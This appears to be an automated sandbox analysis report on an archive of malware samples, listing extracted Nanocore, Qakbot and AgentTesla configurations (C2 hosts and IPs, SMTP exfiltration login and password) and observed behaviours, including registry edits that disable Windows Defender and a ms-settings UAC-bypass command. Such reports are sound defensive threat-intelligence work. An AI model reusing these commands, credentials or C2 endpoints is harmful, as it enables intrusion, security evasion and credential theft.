Analysis
-
max time kernel
1200s -
max time network
1204s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 12:43
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.04.7z
Resource
win10v2004-20240226-en
General
-
Target
https://samples.vx-underground.org/Samples/Bazaar%20Collection/Downloadable%20Releases/Bazaar.2020.04.7z
Malware Config
Extracted
Protocol: smtp- Host:
smtp.yandex.com - Port:
587 - Username:
[email protected] - Password:
ikechukwu112
Extracted
nanocore
1.2.2.0
wae54.duckdns.org:40000
wave54.duckdns.org:40000
dc04a2f6-b691-4363-9339-ed427ef95e06
-
activate_away_mode
true
-
backup_connection_host
wave54.duckdns.org
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2019-12-29T13:16:21.446284736Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
40000
-
default_group
wave11
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
dc04a2f6-b691-4363-9339-ed427ef95e06
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
wae54.duckdns.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Extracted
agenttesla
Protocol: smtp- Host:
smtp.yandex.com - Port:
587 - Username:
[email protected] - Password:
ikechukwu112
Extracted
qakbot
324.75
spx91
1586271924
95.77.223.148:443
68.14.210.246:22
151.205.102.42:443
80.11.10.151:990
24.32.119.146:443
173.69.58.179:443
78.96.245.58:443
172.78.87.180:443
173.3.106.172:2222
207.144.193.210:443
47.134.5.231:443
72.142.106.198:465
108.56.213.203:443
172.251.50.199:443
74.109.200.208:443
108.227.161.27:995
98.13.0.128:443
79.113.219.121:443
84.247.55.190:443
80.14.209.42:2222
104.36.135.227:443
104.174.71.153:2222
96.232.203.15:443
173.79.220.156:443
174.54.24.110:995
50.244.112.10:443
76.23.204.29:443
69.206.6.71:2222
81.106.46.63:443
50.91.171.137:443
75.137.60.81:443
98.116.119.123:443
189.140.74.166:443
24.183.39.93:443
71.197.126.250:443
24.26.1.14:2222
24.27.82.216:2222
100.38.164.182:443
85.204.189.105:443
47.24.47.218:443
50.108.212.180:443
72.228.3.116:443
188.27.17.115:443
68.116.193.239:443
184.167.2.251:2222
67.85.185.6:443
72.36.11.22:443
148.75.231.53:443
216.152.7.12:443
173.62.161.126:443
172.95.42.35:443
173.245.152.231:443
160.2.198.181:443
79.115.86.251:443
75.110.93.212:443
12.162.183.16:443
98.116.62.242:443
92.114.127.71:443
96.37.113.36:443
83.25.10.201:2222
71.77.231.251:443
71.11.209.101:443
79.117.209.13:21
70.166.158.118:443
174.126.230.25:443
24.55.152.50:995
72.36.59.46:2222
73.163.242.114:443
184.13.73.135:443
70.95.94.91:2078
208.126.142.17:443
173.173.1.164:443
74.102.83.89:443
72.209.191.27:443
181.197.195.138:995
98.199.70.195:443
5.14.187.133:443
120.147.65.97:2222
213.31.203.38:2222
89.43.136.239:443
188.25.237.208:443
94.53.92.42:443
67.8.103.21:443
93.118.88.61:443
79.115.211.4:2222
76.30.66.244:443
97.127.144.203:2222
97.81.255.189:443
206.255.163.120:443
66.222.88.126:995
24.90.160.91:443
95.76.27.89:443
209.182.121.133:2222
86.126.232.178:443
96.35.170.82:2222
5.182.39.156:443
67.131.59.17:443
95.77.144.238:443
67.250.184.157:443
68.225.250.136:443
24.110.96.149:443
71.187.170.235:443
77.159.149.74:443
188.173.185.139:443
68.98.142.248:443
100.1.239.189:443
74.135.85.117:443
75.110.250.89:443
24.184.5.251:2222
172.87.134.226:443
86.127.147.205:443
201.209.1.4:2078
71.217.112.41:2222
173.22.120.11:2222
79.113.218.134:443
47.153.115.154:995
70.57.15.187:993
72.190.124.29:443
173.3.132.17:995
23.24.115.181:443
24.229.245.124:995
47.205.231.60:443
72.142.106.198:995
75.111.145.5:443
216.201.162.158:443
98.197.254.40:443
85.7.22.186:2222
24.46.40.189:2222
24.202.42.48:2222
108.54.103.234:443
68.116.183.68:443
70.74.159.126:2222
79.114.194.106:443
69.92.54.95:995
98.199.150.30:443
98.219.77.197:443
69.254.141.249:443
70.124.29.226:443
79.78.131.124:443
74.33.70.30:443
71.182.142.63:443
89.32.154.226:443
72.38.44.119:995
49.191.9.180:995
79.115.4.88:443
47.153.115.154:443
108.27.217.44:443
71.77.252.14:2222
46.153.111.112:995
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
AgentTesla payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3172-327-0x0000000000400000-0x0000000000450000-memory.dmp family_agenttesla -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral1/memory/1940-609-0x0000000005250000-0x00000000052D8000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/1940-609-0x0000000005250000-0x00000000052D8000-memory.dmp WebBrowserPassView -
Nirsoft 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1940-609-0x0000000005250000-0x00000000052D8000-memory.dmp Nirsoft -
Dave packer 1 IoCs
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
Processes:
resource yara_rule behavioral1/memory/4016-389-0x0000000002220000-0x0000000002252000-memory.dmp dave -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmpWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exeHEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autopilot.url Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\30081904L0PR.vbs HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe -
Executes dropped EXE 28 IoCs
Processes:
Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeMBSetup.exeExploit.Win32.ShadowBrokers.ae-85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5.exeHEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exeHEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exeHEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exeHEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exeGetBP.exeEmailPasswordDump.exeFTPPasswordDump.exeHEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exeHEUR-Trojan-Banker.Win32.Emotet.gen-9b391545739faad182793dcda22cd76ecac4cd4d796dbb69663e976c1df11c5e.exeHEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exeHEUR-Trojan-Dropper.MSIL.Sysn.gen-2d247ddbe562ab9d09de813690eab0dc59ae57f5e6ffae2e95b9828d13dccd14.exepid process 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe 1920 Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe 4920 Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp 4352 7z.exe 2808 7z.exe 1444 7z.exe 2884 7z.exe 2216 7z.exe 3424 7z.exe 712 7z.exe 3488 7z.exe 3908 7z.exe 1932 7z.exe 1168 7z.exe 2340 7z.exe 4844 MBSetup.exe 1128 Exploit.Win32.ShadowBrokers.ae-85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5.exe 3948 HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe 3172 HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe 2968 HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe 2008 HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe 744 GetBP.exe 2328 EmailPasswordDump.exe 4964 FTPPasswordDump.exe 3500 HEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exe 4016 HEUR-Trojan-Banker.Win32.Emotet.gen-9b391545739faad182793dcda22cd76ecac4cd4d796dbb69663e976c1df11c5e.exe 1868 HEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exe 1940 HEUR-Trojan-Dropper.MSIL.Sysn.gen-2d247ddbe562ab9d09de813690eab0dc59ae57f5e6ffae2e95b9828d13dccd14.exe -
Loads dropped DLL 12 IoCs
Processes:
7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exepid process 4352 7z.exe 2808 7z.exe 1444 7z.exe 2884 7z.exe 2216 7z.exe 3424 7z.exe 712 7z.exe 3488 7z.exe 3908 7z.exe 1932 7z.exe 1168 7z.exe 2340 7z.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/2008-334-0x0000000000400000-0x00000000007EA000-memory.dmp upx behavioral1/memory/2008-336-0x0000000000400000-0x00000000007EA000-memory.dmp upx behavioral1/memory/2008-339-0x0000000000400000-0x00000000007EA000-memory.dmp upx behavioral1/memory/2008-335-0x0000000000400000-0x00000000007EA000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
Processes:
EmailPasswordDump.exevbc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts EmailPasswordDump.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts vbc.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exeRegAsm.exeRegAsm.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\suck_My_dick = "C:\\Users\\Admin\\AppData\\Local\\Temp\\cae33a0264ead2ddfbc3ea113da66790.exe / start" HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" RegAsm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SMTP Subsystem = "C:\\Program Files (x86)\\SMTP Subsystem\\smtpss.exe" RegAsm.exe -
Processes:
RegAsm.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegAsm.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 397 whatismyipaddress.com 399 whatismyipaddress.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\Desktop\Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe autoit_exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exeHEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exeHEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exeHEUR-Trojan-Dropper.MSIL.Sysn.gen-2d247ddbe562ab9d09de813690eab0dc59ae57f5e6ffae2e95b9828d13dccd14.exeRegAsm.exedescription pid process target process PID 5036 set thread context of 4240 5036 Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe RegAsm.exe PID 3948 set thread context of 3172 3948 HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe HEUR-Backdoor.MSIL.NanoBot.gen-8a5f9b060b9ea5ff21a5b1654836935d779ea8868d8f6d49bff50074ddfcf8dd.exe PID 2968 set thread context of 2008 2968 HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe HEUR-Backdoor.Win32.Androm.gen-425b6f4931518861eddd73d943cf463db97247741677bf96cd6efa61a28400df.exe PID 1940 set thread context of 3416 1940 HEUR-Trojan-Dropper.MSIL.Sysn.gen-2d247ddbe562ab9d09de813690eab0dc59ae57f5e6ffae2e95b9828d13dccd14.exe RegAsm.exe PID 3416 set thread context of 4596 3416 RegAsm.exe vbc.exe PID 3416 set thread context of 2724 3416 RegAsm.exe vbc.exe -
Drops file in Program Files directory 3 IoCs
Processes:
RegAsm.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmpdescription ioc process File created C:\Program Files (x86)\SMTP Subsystem\smtpss.exe RegAsm.exe File opened for modification C:\Program Files (x86)\SMTP Subsystem\smtpss.exe RegAsm.exe File created C:\Program Files (x86)\WindowsPowerShell\Configuration\is-G0H28.tmp Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2500 1868 WerFault.exe HEUR-Trojan-Banker.Win32.Qbot.vho-9c76a29d9349d21165a916b11ded6139a3cc066d3c59880a5b9016d42ea948fd.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exeWINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2496 schtasks.exe 4068 schtasks.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
Processes:
msedge.exeWINWORD.EXEdw20.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 9 IoCs
Processes:
reg.exemsedge.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmpreg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\DelegateExecute = " " reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{022E942D-5595-4500-ABDC-58268448F105} msedge.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "C:\\windows\\SysWow64\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1980 WINWORD.EXE 1980 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exeRegAsm.exemsedge.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmppid process 1872 msedge.exe 1872 msedge.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 416 msedge.exe 416 msedge.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4920 Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp 4920 Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe 4240 RegAsm.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
7zFM.exeRegAsm.exeHEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exepid process 4348 7zFM.exe 4240 RegAsm.exe 3500 HEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
